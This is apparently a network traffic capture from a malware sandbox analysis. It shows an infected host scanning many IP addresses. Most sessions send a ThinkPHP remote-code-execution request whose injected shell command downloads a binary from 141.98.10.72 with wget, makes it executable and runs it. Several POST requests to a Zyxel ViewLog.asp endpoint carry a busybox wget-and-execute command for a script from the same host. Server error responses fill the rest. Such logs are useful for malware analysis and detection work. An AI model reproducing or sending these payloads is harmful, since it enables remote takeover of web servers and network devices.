                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            990192.168.2.2351824112.12.91.12480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:12.978097916 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:13.386312008 CET477INHTTP/1.1 400 Bad Request
                                                            Server: kngx/1.10.2
                                                            Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 172
                                                            Connection: close
                                                            KS-Deny-Reason: client|81.181.57.74|cdnjhmp01-cache26.cdnjhmp01.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                            x-link-via: jhmp01:80;
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            991192.168.2.234133695.104.244.15280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:13.079555035 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:13.309156895 CET440INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                            Server: Apache/2.4.6 (Scientific Linux) PHP/5.4.16
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            992192.168.2.234605295.31.224.780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:13.096087933 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            993192.168.2.234668895.86.103.16480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:13.103741884 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            994192.168.2.234321295.56.126.7380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:13.270714045 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:13.565256119 CET976INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                            Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.30 26Oc


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            995192.168.2.2343644112.74.217.20680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:13.693546057 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:14.053766012 CET318INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Via: HTTP/1.1 SLB.16
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            996192.168.2.2351820112.12.91.12480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:13.714899063 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:14.132801056 CET477INHTTP/1.1 400 Bad Request
                                                            Server: kngx/1.10.2
                                                            Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 172
                                                            Connection: close
                                                            KS-Deny-Reason: client|81.181.57.74|cdnjhmp01-cache26.cdnjhmp01.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                            x-link-via: jhmp01:80;
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>
                                                            Feb 14, 2024 09:30:15.353638887 CET477INHTTP/1.1 400 Bad Request
                                                            Server: kngx/1.10.2
                                                            Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 172
                                                            Connection: close
                                                            KS-Deny-Reason: client|81.181.57.74|cdnjhmp01-cache26.cdnjhmp01.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                            x-link-via: jhmp01:80;
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>
                                                            Feb 14, 2024 09:30:15.561647892 CET477INHTTP/1.1 400 Bad Request
                                                            Server: kngx/1.10.2
                                                            Date: Wed, 14 Feb 2024 08:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 172
                                                            Connection: close
                                                            KS-Deny-Reason: client|81.181.57.74|cdnjhmp01-cache26.cdnjhmp01.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                            x-link-via: jhmp01:80;
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            997192.168.2.234322295.56.126.7380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:13.852716923 CET794INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 33 30 20 32 36 4f 63 74 32 30 31 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20
                                                            Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.30 26Oct2018Date: Wed, 14 Feb 2024 08:30:13 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sContent-Security-Policy: frame-ancestors 'none'Content-Security-Policy: fr


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            998192.168.2.233505694.122.214.2428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:14.065654039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:15.376394987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.912201881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.951790094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:26.094894886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:38.381447077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:04.489685059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            999192.168.2.234829695.100.52.22980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:14.254226923 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:14.462076902 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:30:14 GMT
                                                            Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 37 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 34 26 23 34 36 3b 64 35 31 31 63 34 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;67f90a17&#46;1707899414&#46;d511c47</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1000192.168.2.236059095.143.177.1280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:14.259568930 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:14.472815037 CET322INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1001192.168.2.233784695.217.18.18180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:14.266776085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:14.489516973 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1002192.168.2.234933695.163.238.16680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:14.281752110 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:14.517437935 CET750INHTTP/1.1 400 Bad Request
                                                            Server: ngjit
                                                            Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf8
                                                            Content-Length: 579
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 20 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 20 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 70 3e 3c 62 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 20 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 53 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 